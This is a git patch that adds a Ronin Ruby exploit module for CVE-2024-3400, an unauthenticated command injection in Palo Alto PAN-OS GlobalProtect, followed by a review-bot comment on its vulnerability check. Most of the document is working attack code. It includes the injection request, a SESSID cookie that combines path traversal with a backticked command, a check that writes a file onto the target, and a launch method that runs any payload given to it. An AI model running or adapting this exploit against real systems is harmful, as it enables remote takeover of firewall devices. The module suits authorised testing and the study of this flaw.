From dda985a85bd43d186977ca6e2e79b18daeb9671b Mon Sep 17 00:00:00 2001
From: Postmodern
Date: Fri, 28 Jun 2024 21:42:47 -0700
Subject: [PATCH] Added a PoC for CVE-2024-3400 (closes #1).
---
 exploits/palo-alto/pan-os/CVE-2024-3400.rb | 92 ++++++++++++++++++++++
 1 file changed, 92 insertions(+)
 create mode 100755 exploits/palo-alto/pan-os/CVE-2024-3400.rb
diff --git a/exploits/palo-alto/pan-os/CVE-2024-3400.rb b/exploits/palo-alto/pan-os/CVE-2024-3400.rb
new file mode 100755
index 0000000..a2f3617
--- /dev/null
+++ b/exploits/palo-alto/pan-os/CVE-2024-3400.rb
@@ -0,0 +1,92 @@
+#!/usr/bin/env -S ronin-exploits run -f
+
+require 'ronin/exploits/command_injection'
+require 'ronin/exploits/mixins/http'
+
+module Ronin
+ module Exploits
+ #
+ # PoC for CVE-2024-3400.
+ #
+ # This exploit is based on the following previous PoCs:
+ #
+ # * https://github.com/CONDITIONBLACK/CVE-2024-3400-POC
+ # * https://github.com/ZephrFish/CVE-2024-3400-Canary
+ # * https://github.com/Kr0ff/cve-2024-3400
+ #
+ class CVE_2024_3400 < CommandInjection
+
+ include Mixins::HTTP
+
+ register 'palo-alto/pan-os/CVE-2024-3400'
+
+ quality :untested
+ release_date '2024-04-16'
+ disclosure_date '2024-04-12'
+ advisory 'CVE-2024-3400'
+
+ author "Postmodern", email: "postmodern.mod3@gmail.com"
+ summary "Command injection in Palo Alto Networks PAN-OS"
+ description <<~DESC
+ Palo Alto Networks PAN-OS is vulnerable to a remote unauthenticated
+ command injection via the `SESSID` cookie parameter in it's
+ GlobalProtect feature.
+
+ GET /global-protect/login.esp HTTP/1.1
+ Host: example.com
+ Cookie: SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/`COMMAND`
+
+ DESC
+ references [
+ "https://github.com/CONDITIONBLACK/CVE-2024-3400-POC",
+ "https://github.com/ZephrFish/CVE-2024-3400-Canary",
+ "https://github.com/Kr0ff/cve-2024-3400"
+ ]
+
+ #
+ # Test whether the target system is vulnerable.
+ #
+ # It does this by sending a HTTP POST request to `/ssl-vpn/hipreport.esp`
+ # with the `SESSID` cookie parameter containing a path traversal back into
+ # the web application's images directory
+ # (`/global-protect/portal/images/`), which causes the `test.txt` file to
+ # be created within the images directory.
+ #
+ # If `/global-protect/portal/images/test.txt` can then be requested, and
+ # it returns a HTTP 403 status code, the host is considered vulnerable.
+ #
+ def test
+ file_name = 'test.txt'
+ file_path = "/global-protect/portal/images/#{file_name}"
+
+ sessid = File.join("../../../var/appweb/sslvpndocs",file_path)
+
+ response = http_post(
+ '/ssl-vpn/hipreport.esp', cookie: {'SESSID' => sessid}
+ )
+
+ if response.code == '200'
+ if http_get(file_path).code == '403'
+ Vulnerable('host is vulnerable')
+ else
+ NotVulnerable('host is patched')
+ end
+ else
+ NotVulnerable('host is patched')
+ end
+ end
+
+ #
+ # Sends a HTTP GET request to `/global-protect/login.esp` with the
+ # `SESSID` cookie parameter containing a directory traversal and the
+ # command payload wrapped in backticks.
+ #
+ def launch
+ sessid = "../../../../opt/panlogs/tmp/device_telemetry/minute/`#{payload}`"
+
+ http_get('/global-protect/login.esp', cookie: {'SESSID' => sessid})
+ end
+
+ end
+ end
+end
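Review bot: Both `NotVulnerable('host is patched')` branches in `test` report a definite patched state for conditions the code cannot distinguish — a non-200 from the POST to `/ssl-vpn/hipreport.esp` (endpoint absent, WAF, transient error) and a non-403 from the follow-up GET — so the message overstates what was observed; something like `NotVulnerable("unexpected #{response.code} from /ssl-vpn/hipreport.esp")` for the outer branch and `NotVulnerable('test.txt not served with 403')` for the inner one would keep the two outcomes apart. The check also leaves `test.txt` in the target's images directory and nothing removes it, and because the GET alone cannot tell a freshly written file from one left by an earlier run, a host patched since a previous scan may still be reported as vulnerable; the method's docstring should state that it writes a persistent artifact and note that limitation. Given `quality :untested` on the class, the 200/403 assumptions inherited from the referenced PoCs are worth a sentence in the description too.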